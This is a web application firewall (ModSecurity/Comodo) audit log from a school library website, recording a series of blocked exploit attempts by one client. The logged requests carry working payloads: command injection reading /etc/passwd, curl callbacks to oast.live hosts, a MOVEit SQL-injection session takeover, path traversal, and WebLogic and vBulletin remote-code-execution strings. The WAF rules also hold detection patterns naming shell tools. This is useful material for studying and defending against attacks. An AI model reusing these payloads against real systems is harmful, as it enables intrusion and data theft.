[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300111418408 2572 (- - -) Stopwatch2: 1748300111418408 2572; combined=1397, p1=352, p2=1017, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --811fa764-Z-- --061a8a1b-A-- [27/May/2025:05:55:33 +0700] aDTxZd6cNBpj1JOkpQlLDQAAAEM 103.236.140.4 48782 103.236.140.4 8181 --061a8a1b-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 168708082 --061a8a1b-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --061a8a1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --061a8a1b-E-- --061a8a1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300133423925 1670 (- - -) Stopwatch2: 1748300133423925 1670; combined=489, p1=334, p2=133, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --061a8a1b-Z-- --6b80111b-A-- [27/May/2025:06:03:19 +0700] aDTzN96cNBpj1JOkpQlLJwAAAFM 103.236.140.4 48884 103.236.140.4 8181 --6b80111b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 163090670 --6b80111b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0q9cd1gpeook7mlf7sgwu45rher4dtbx.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --6b80111b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b80111b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300599099931 4031 (- - -) Stopwatch2: 1748300599099931 4031; combined=2689, p1=613, p2=1964, p3=31, p4=36, p5=44, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b80111b-Z-- --f937bc17-A-- [27/May/2025:06:24:57 +0700] aDT4SWTuEZUBy5rh0sZ7rAAAAAs 103.236.140.4 49172 103.236.140.4 8181 --f937bc17-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=hngvr2rk3usmbrdi4bvif2c631 X-Varnish: 168969526 --f937bc17-C-- --f937bc17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f937bc17-E-- --f937bc17-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748301897101301 3908 (- - -) Stopwatch2: 1748301897101301 3908; combined=1882, p1=592, p2=1258, p3=0, p4=0, p5=32, sr=161, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f937bc17-Z-- --3308346a-A-- [27/May/2025:06:25:16 +0700] aDT4XGTuEZUBy5rh0sZ7rgAAAAo 103.236.140.4 49184 103.236.140.4 8181 --3308346a-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdkfntaUQuE0gGpiDiWzgksxqs');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE 
SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hngvr2rk3usmbrdi4bvif2c631 X-Varnish: 168969529 --3308346a-C-- --3308346a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3308346a-E-- --3308346a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748301916099171 3356 (- - -) Stopwatch2: 1748301916099171 3356; combined=1587, p1=453, p2=1103, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3308346a-Z-- --66888538-A-- [27/May/2025:06:39:35 +0700] aDT7t1uSH_Spa4YU2ZmqcwAAAMg 103.236.140.4 50116 103.236.140.4 8181 --66888538-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792000 --66888538-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0q9cd1gpeook7mlf7sghi1k7cf9ygnu1.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --66888538-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --66888538-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748302775119762 3453 (- - -) Stopwatch2: 1748302775119762 3453; combined=2360, p1=459, p2=1813, p3=29, p4=31, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66888538-Z-- --f6036336-A-- [27/May/2025:07:17:42 +0700] aDUEpt6cNBpj1JOkpQlMFQAAAE8 103.236.140.4 50700 103.236.140.4 8181 --f6036336-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=08jc3ctr85pnsme4iem1s9u2bk X-Varnish: 166620366 --f6036336-C-- --f6036336-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6036336-E-- --f6036336-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305062098083 3344 (- - -) Stopwatch2: 1748305062098083 3344; combined=1696, p1=483, p2=1185, p3=0, p4=0, p5=28, sr=99, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6036336-Z-- --9cacdd44-A-- [27/May/2025:07:17:48 +0700] aDUErN6cNBpj1JOkpQlMFwAAAFQ 103.236.140.4 50710 103.236.140.4 8181 --9cacdd44-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdkfntaUQuE0gGpiDiWzgksxqs');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=08jc3ctr85pnsme4iem1s9u2bk X-Varnish: 169021357 --9cacdd44-C-- --9cacdd44-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close 
Content-Type: text/html; charset=iso-8859-1 --9cacdd44-E-- --9cacdd44-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305068117648 3847 (- - -) Stopwatch2: 1748305068117648 3847; combined=1807, p1=545, p2=1227, p3=0, p4=0, p5=35, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cacdd44-Z-- --916f7265-A-- [27/May/2025:07:30:36 +0700] aDUHrFuSH_Spa4YU2ZmqpgAAAMc 103.236.140.4 50924 103.236.140.4 8181 --916f7265-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168996674 --916f7265-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --916f7265-E-- --916f7265-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305836116922 1512 (- - -) Stopwatch2: 1748305836116922 1512; combined=463, p1=326, p2=109, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916f7265-Z-- --1786f260-A-- [27/May/2025:07:36:15 +0700] aDUI_96cNBpj1JOkpQlMLAAAAEg 103.236.140.4 50968 103.236.140.4 8181 --1786f260-B-- POST /userentry?accountId=/../../../tomcat/webapps/SuEn4/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792044 --1786f260-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --1786f260-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1786f260-E-- --1786f260-H-- Message: Access denied with code 403 (phase 2). 
Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306175100305 4667 (- - -) Stopwatch2: 1748306175100305 4667; combined=2629, p1=526, p2=2069, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1786f260-Z-- --e35fd55f-A-- [27/May/2025:07:45:37 +0700] aDULMd6cNBpj1JOkpQlMMQAAAFM 103.236.140.4 51076 103.236.140.4 8181 --e35fd55f-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0qa44pgpeoi1bmoheagzxps77zprg8ej.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168708150 --e35fd55f-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --e35fd55f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e35fd55f-E-- --e35fd55f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737020303 2390 (- - -) Stopwatch2: 1748306737020303 2390; combined=655, p1=321, p2=305, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35fd55f-Z-- --6f977e7d-A-- [27/May/2025:07:45:37 +0700] aDULMRLFq2VRfSzm6b8PbQAAAI4 103.236.140.4 51068 103.236.140.4 8181 --6f977e7d-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 160587717 --6f977e7d-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --6f977e7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f977e7d-E-- --6f977e7d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737037497 1661 (- - -) Stopwatch2: 1748306737037497 1661; combined=555, p1=348, p2=180, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f977e7d-Z-- --4f5e035e-A-- [27/May/2025:07:45:37 +0700] aDULMd6cNBpj1JOkpQlMMwAAAFE 103.236.140.4 51054 103.236.140.4 8181 --4f5e035e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: 